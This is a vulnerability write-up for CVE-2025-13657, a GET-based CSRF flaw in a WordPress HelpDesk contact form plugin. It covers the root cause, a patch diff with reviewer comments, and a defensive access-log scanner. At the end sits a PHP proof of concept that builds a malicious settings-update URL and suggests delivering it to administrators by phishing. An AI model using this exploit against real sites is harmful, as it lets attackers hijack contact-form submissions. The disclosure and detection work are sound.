Atomic Edge analysis of CVE-2025-13657:
The HelpDesk contact form plugin for WordPress, in versions up to and including 1.1.5, contains a Cross-Site Request Forgery (CSRF) vulnerability in its settings update functionality. This medium-severity flaw lets an attacker modify plugin configuration without authorization by inducing a logged-in administrator's browser to issue the update request.
Atomic Edge research identifies the root cause as missing nonce validation in the handle_query_args() function in class-admin-page.php. The function reads the GET parameters licenseID and contactFormID straight from the request and applies them without verifying that the request originated from the plugin's own pages. The comment removed by the patch asserted that nonce verification was unnecessary because non-admins cannot access the page. That reasoning confuses authorization with request provenance: in a CSRF attack the request is issued by the administrator's own browser, carrying the administrator's session cookies, from a page the attacker controls, so the capability check is satisfied even though the administrator never intended the change.
Exploitation consists of crafting a link or web page that causes a GET request to the WordPress admin area: the /wp-admin/admin.php endpoint with the page=helpdesk parameter, plus licenseID and contactFormID set to values of the attacker's choosing. When an authenticated administrator follows the link, the browser attaches the session cookies automatically and the settings update executes. No payload encoding beyond standard URL parameters is needed, and because the request is a plain GET, the attacker's page needs neither a form nor JavaScript.
The patch in version 1.1.6 adds nonce validation to handle_query_args(). The fix has three parts: a check of the _wpnonce request parameter with wp_verify_nonce() against the action helpdesk_update_settings, sanitization of the incoming values with sanitize_text_field() and wp_unslash(), and generation of that nonce with wp_create_nonce() in class-helpdesk-api.php, where it is appended to the admin URL carried in the state value of the HelpDesk authentication redirect. Only the redirect back from that authentication flow therefore carries a valid nonce; a URL assembled by a third party does not. The patch also updates the nonce verification guarding create_page_with_hd_form() to sanitize the posted nonce before verifying it, applying the same hygiene throughout the codebase.
Successful exploitation lets an attacker overwrite the plugin's license ID and contact form ID settings. Form submissions could then be routed to an attacker-controlled HelpDesk account, legitimate customer support workflows disrupted, or the contact form broken outright (a denial of service). The flaw does not by itself yield privilege escalation or remote code execution, but it compromises the integrity of a customer communication channel, and messages captured that way could support follow-on social engineering.
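Added example (not from the Atomic Edge write-up or the plugin's code): a Python access-log scanner for the request shape described above, flagging GET requests to admin.php?page=helpdesk that carry licenseID but no _wpnonce, and rating a foreign Referer higher. It assumes combined log format with a Referer field; the hostnames and log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log-format line with Referer field; the regex is constructed for this example.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"')
SITE_HOST = "shop.example"  # constructed: hostname of the WordPress site being monitored

def classify(line, site_host=SITE_HOST):
    """Return None for unrelated lines, else a finding for a helpdesk settings update."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET":
        return None
    parts = urlsplit(m["target"])
    if parts.path != "/wp-admin/admin.php":
        return None
    q = parse_qs(parts.query)
    if q.get("page") != ["helpdesk"] or "licenseID" not in q:
        return None  # an ordinary visit to the settings page never carries licenseID
    ref_host = urlsplit(m["referer"]).hostname
    has_nonce = "_wpnonce" in q  # only the patched (>= 1.1.6) redirect flow carries it
    cross_site = bool(ref_host) and ref_host != site_host
    if not has_nonce and cross_site:
        severity = "high"    # CSRF shape: nonce-less update navigated from a foreign page
    elif not has_nonce:
        severity = "medium"  # nonce-less update, no Referer evidence (direct or legacy link)
    else:
        severity = "info"    # nonce present; WordPress still validates it server-side
    return {"ip": m["ip"], "licenseID": q["licenseID"][0],
            "contactFormID": q.get("contactFormID", [""])[0],
            "has_nonce": has_nonce, "cross_site": cross_site, "severity": severity}

def scan(log_text, site_host=SITE_HOST):
    """Run classify() over every line and keep only the findings."""
    return [f for f in (classify(ln, site_host) for ln in log_text.splitlines()) if f]

# Constructed sample: one CSRF-shaped request, one nonce-bearing return from the
# HelpDesk authentication flow, one ordinary visit to the settings page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2025:09:12:01 +0000] "GET /wp-admin/admin.php?page=helpdesk&licenseID=evil-license&contactFormID=evil-form HTTP/1.1" 302 0 "https://attacker.example/post"
198.51.100.4 - - [10/Nov/2025:09:13:44 +0000] "GET /wp-admin/admin.php?page=helpdesk&licenseID=lic-001&contactFormID=form-1&_wpnonce=1a2b3c4d5e HTTP/1.1" 302 0 "https://app.helpdesk.com/"
198.51.100.4 - - [10/Nov/2025:09:14:10 +0000] "GET /wp-admin/admin.php?page=helpdesk HTTP/1.1" 200 5120 "https://shop.example/wp-admin/"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["licenseID"], "cross-site" if f["cross_site"] else "same-site")
```

On a site still running 1.1.5, every nonce-less hit is worth reviewing, since the plugin applied those values unconditionally.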
--- a/helpdesk-contact-form/helpdesk-contact-form.php
+++ b/helpdesk-contact-form/helpdesk-contact-form.php
@@ -7,7 +7,7 @@
* Plugin Name: HelpDesk Contact Form
* Plugin URI: https://www.helpdesk.com/integrations/wordpress
* Description: Make communication effortless with the WordPress contact form plugin provided by HelpDesk. Create your contact form without any coding and manage all website messages in one spot.
- * Version: 1.1.5
+ * Version: 1.1.6
* Requires at least: 4.6
* Requires PHP: 6.1
* Author: text.com
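Review bot: while the header is being touched, the `Requires PHP: 6.1` line two below the version bump names a PHP release that never shipped (the major versions went from 5.6 to 7.0), so it should be corrected to the actual minimum the plugin needs.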
--- a/helpdesk-contact-form/includes/class-admin-page.php
+++ b/helpdesk-contact-form/includes/class-admin-page.php
@@ -66,12 +66,18 @@
if (!isset($_GET["licenseID"])) {
return;
}
+
+ // Verify nonce to prevent CSRF attacks
+ // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+ if (!isset($_GET["_wpnonce"]) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_GET["_wpnonce"])), "helpdesk_update_settings")) {
+ return;
+ }
+
// phpcs:ignore WordPress.Security.NonceVerification.Recommended
- $licenseID = sanitize_text_field($_GET["licenseID"]);
+ $licenseID = sanitize_text_field(wp_unslash($_GET["licenseID"]));
// phpcs:ignore WordPress.Security.NonceVerification.Recommended
- $contactFormID = sanitize_text_field($_GET["contactFormID"]);
+ $contactFormID = isset($_GET["contactFormID"]) ? sanitize_text_field(wp_unslash($_GET["contactFormID"])) : "";
- // Nonce verification not required there - no sensitive data is being processed and non-admins can't access the page
if (!$licenseID) {
return;
}
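Review bot: the new nonce check fails silently with `return`, whereas the existing nonce check in this file (the helpdesk_create_page branch) calls wp_die() with a translated message; a forged, expired or missing `_wpnonce` on this path leaves the administrator on the settings page with no sign that the update was dropped, and any pre-1.1.6 link without a nonce now stops working without explanation. Consider `check_admin_referer('helpdesk_update_settings')`, which combines the isset/verify pair and dies on failure, and drop the `// phpcs:ignore WordPress.Security.NonceVerification.Recommended` placed directly on the verification line, since that line is the verification; the two remaining phpcs:ignore lines above the licenseID and contactFormID reads should also no longer be needed once the nonce is verified before them.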
@@ -404,7 +410,7 @@
isset($_POST["helpdesk_create_page"]) &&
$_POST["helpdesk_create_page"] == "1"
) {
- if (!isset($_POST['helpdesk_create_page_nonce']) || !wp_verify_nonce($_POST['helpdesk_create_page_nonce'], 'helpdesk_create_page_action')) {
+ if (!isset($_POST['helpdesk_create_page_nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['helpdesk_create_page_nonce'])), 'helpdesk_create_page_action')) {
wp_die(esc_html(__('Nonce verification failed', 'helpdesk-contact-form')));
}
$this->create_page_with_hd_form();
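Review bot: sanitizing the nonce before wp_verify_nonce() is harmless but changes nothing security-wise, because wp_verify_nonce() compares the supplied value against hashes it computes itself, so an unsanitized nonce can only fail verification. The loose `== "1"` comparison on helpdesk_create_page two lines above is the line worth tightening to `=== "1"`, and the whole check could collapse to `check_admin_referer('helpdesk_create_page_action', 'helpdesk_create_page_nonce')`, which already calls wp_die() on failure.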
--- a/helpdesk-contact-form/includes/class-helpdesk-api.php
+++ b/helpdesk-contact-form/includes/class-helpdesk-api.php
@@ -47,7 +47,11 @@
return $json;
}
- $state = generateUriEncodedJson(admin_url( 'admin.php?page=helpdesk' ));
+ // Generate WordPress nonce for CSRF protection
+ $wp_nonce = wp_create_nonce('helpdesk_update_settings');
+
+ $location_with_nonce = add_query_arg('_wpnonce', $wp_nonce, admin_url('admin.php?page=helpdesk'));
+ $state = generateUriEncodedJson($location_with_nonce);
$url .= '&state=' . urlencode($state);
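Review bot: the nonce is now carried inside the `state` value of the outbound authentication URL, so it round-trips through the HelpDesk service before returning to admin.php. Two properties of wp_create_nonce() deserve a comment next to this line: the nonce is bound to the current user and session, so a callback that lands in a different browser session fails verification, and it expires after the default 12 to 24 hour nonce lifetime, after which the `return` in handle_query_args() drops the callback silently.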
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13657 - HelpDesk contact form plugin <= 1.1.5 - Cross-Site Request Forgery to Settings Update via handle_query_args
<?php
/**
 * Proof of Concept for CVE-2025-13657
 * CSRF attack against HelpDesk Contact Form plugin <= 1.1.5
 *
 * This script generates a malicious URL that, when visited by an authenticated
 * WordPress administrator, will update the plugin's license ID and contact form ID
 * settings without their knowledge or consent.
 *
 * Usage: Set $target_url to the WordPress site, then share the generated URL
 * with an administrator (via phishing, comments, etc.)
 */

// Configuration
$target_url = 'https://vulnerable-wordpress-site.com'; // Change this to target site
$malicious_license_id = 'attacker-controlled-license';
$malicious_form_id = 'attacker-form-123';

// Construct the CSRF attack URL
$admin_path = '/wp-admin/admin.php';
$parameters = array(
    'page' => 'helpdesk',
    'licenseID' => $malicious_license_id,
    'contactFormID' => $malicious_form_id
);
$attack_url = $target_url . $admin_path . '?' . http_build_query($parameters);

// Output the malicious URL
echo "Atomic Edge CVE-2025-13657 Proof of Concept\n";
echo "============================================\n\n";
echo "Target: $target_url\n";
echo "Vulnerable Plugin: HelpDesk Contact Form <= 1.1.5\n";
echo "Attack Type: Cross-Site Request Forgery (CSRF)\n\n";
echo "Malicious CSRF URL:\n";
echo "$attack_url\n\n";

// Manual verification steps (this script only prints the URL; it sends no request itself)
echo "\nTo test exploitation manually:\n";
echo "1. Log into WordPress as an administrator\n";
echo "2. Visit the URL above in the same browser\n";
echo "3. The plugin settings will be updated without confirmation\n\n";

// Note: This is a GET-based CSRF, so no POST data or JavaScript required
// The attack works because the handle_query_args() function lacks nonce validation
// in vulnerable versions (<= 1.1.5) of the plugin
?>